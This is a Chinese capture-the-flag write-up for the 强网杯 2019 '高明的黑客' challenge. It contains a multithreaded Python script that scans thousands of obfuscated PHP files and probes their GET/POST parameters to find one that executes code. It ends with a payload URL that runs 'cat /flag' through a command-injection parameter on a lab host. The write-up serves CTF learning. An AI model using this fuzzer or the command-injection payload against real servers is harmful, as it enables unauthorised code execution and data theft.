[强网杯 2019]高明的黑客

打开靶机,提示网站源码已经备份:

下载源码后发现有 3002 个 PHP 文件,内容都是大量无意义的代码,逐个人工审计不现实。参考大佬的 WriteUp 得知可以写脚本自动化:提取每个文件里引用的 $_GET/$_POST 参数名,向本地搭建的站点逐一发送 `echo '标记';` 这样的探测语句,根据响应中是否出现标记来判断哪个文件、哪个参数能真正执行代码。注意只把参数原样回显的页面同样会带上标记,属于误报,命中后仍需人工确认。
大佬的脚本如下:

import os
import requests
import re
import threading
import time

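print('开始时间: ' + time.asctime(time.localtime(time.time())))
MAX_WORKERS = 100  # upper bound on concurrent probes (was a bare literal in the Semaphore call)
s1 = threading.Semaphore(MAX_WORKERS)
filePath = r"D:\phpstudy_pro\WWW\JMDHK\src"  # local copy of the leaked site source
os.chdir(filePath)  # get_content() opens files by bare name, so cwd must be the source dir
# Only regular files: listdir() also returns sub-directories, and open() on one
# would raise inside a worker thread.
files = [name for name in os.listdir(filePath) if os.path.isfile(name)]
session = requests.Session()
# Retries have to be configured on the adapter. HTTPAdapter.__init__ binds
# DEFAULT_RETRIES as a default argument when requests is imported, so assigning
# requests.adapters.DEFAULT_RETRIES afterwards (as the original did) changes nothing.
# pool_maxsize matches the worker cap so MAX_WORKERS parallel requests don't
# exhaust the connection pool.
adapter = requests.adapters.HTTPAdapter(
    max_retries=5, pool_connections=MAX_WORKERS, pool_maxsize=MAX_WORKERS,
)
session.mount('http://', adapter)
# requests.Session has no keep_alive attribute; `session.keep_alive = False` was a
# silent no-op. Asking the server to close each connection does what was intended.
session.headers['Connection'] = 'close'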


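MARKER = '15h3na0'
# `echo '...';` is valid both as PHP fed to an eval()-style sink and as a shell
# command fed to a system()-style sink, so one probe covers both kinds of execution.
PAYLOAD = "echo '%s';" % MARKER
# The original patterns only matched single-quoted keys and were written as
# non-raw strings ('\$' is an invalid escape). Accept $_GET['x'] and $_GET["x"].
GET_RE = re.compile(r'\$_GET\[\s*[\'"](.*?)[\'"]\s*\]')
POST_RE = re.compile(r'\$_POST\[\s*[\'"](.*?)[\'"]\s*\]')


def extract_params(source):
    """Return (get_names, post_names) referenced in the PHP text *source*.

    Order of first appearance is kept; duplicates are dropped so each name is
    probed only once.
    """
    gets = list(dict.fromkeys(GET_RE.findall(source)))
    posts = list(dict.fromkeys(POST_RE.findall(source)))
    return gets, posts


def payload_executed(content):
    """Return True if *content* looks like the probe was executed rather than echoed.

    A page that merely reflects its input (`echo $_GET['x'];`) also contains the
    marker, so the verbatim payload must be absent as well. HTML-escaped
    reflection can still slip through: confirm hits by hand before using them.
    """
    return MARKER in content and PAYLOAD not in content


def get_content(file):
    """Probe one PHP file for a parameter that reaches code execution.

    Reads *file* from the current directory, collects every $_GET/$_POST key it
    references, sends them all in one request carrying PAYLOAD, and on a hit
    narrows down to the single GET or POST parameter responsible. Results are
    printed; nothing is returned. Runs under the module-level semaphore `s1`
    and sends requests through the module-level `session`.
    """
    with s1:  # context manager releases the slot even if a request raises
        print('trying ' + file + ' ' + time.asctime(time.localtime(time.time())))
        # Read once: the original called f.read() twice, so the second call saw
        # EOF and the $_POST list was always empty.
        with open(file, encoding='utf-8', errors='replace') as f:
            gets, posts = extract_params(f.read())
        if not gets and not posts:
            return  # nothing to inject into
        url = 'http://127.0.0.1/JMDHK/src/' + file
        params = {name: PAYLOAD for name in gets}
        data = {name: PAYLOAD for name in posts}
        resp = session.post(url, data=data, params=params)  # all candidates in one shot
        hit = payload_executed(resp.text)
        resp.close()
        if not hit:
            return
        # Narrow down to the single parameter responsible.
        param = None
        for name in gets:
            resp = session.get(url, params={name: PAYLOAD})  # let requests URL-encode the payload
            hit = payload_executed(resp.text)
            resp.close()
            if hit:
                param = 'GET ' + name
                break
        if param is None:
            for name in posts:
                resp = session.post(url, data={name: PAYLOAD})
                hit = payload_executed(resp.text)
                resp.close()
                if hit:
                    param = 'POST ' + name
                    break
        if param is None:
            # The original reached an unbound `b` here (or blamed the last POST key).
            param = '(only the combined GET+POST request fired; inspect manually)'
        print('找到了利用文件: ' + file + " and 找到了利用的参数:%s" % param)
        print('结束时间: ' + time.asctime(time.localtime(time.time())))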


# Fan out one worker thread per file; the semaphore inside get_content()
# bounds how many of them actually run at once.
workers = [threading.Thread(target=get_content, args=(name,)) for name in files]
for worker in workers:
    worker.start()

开 100 个并发线程跑了几十秒(3002 个文件、每个至少一次请求),电脑负载很高,最终得到可利用的文件和参数:

从最终 payload 能直接执行 cat /flag 来看,该参数的值被当作系统命令执行(例如传给了 system()),因此直接读取 /flag 即可:

最终Payload:

http://61250690-f800-4271-92e5-6484b2559f1f.node3.buuoj.cn/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag

参考资料:[强网杯 2019]高明的黑客(考察代码编写能力)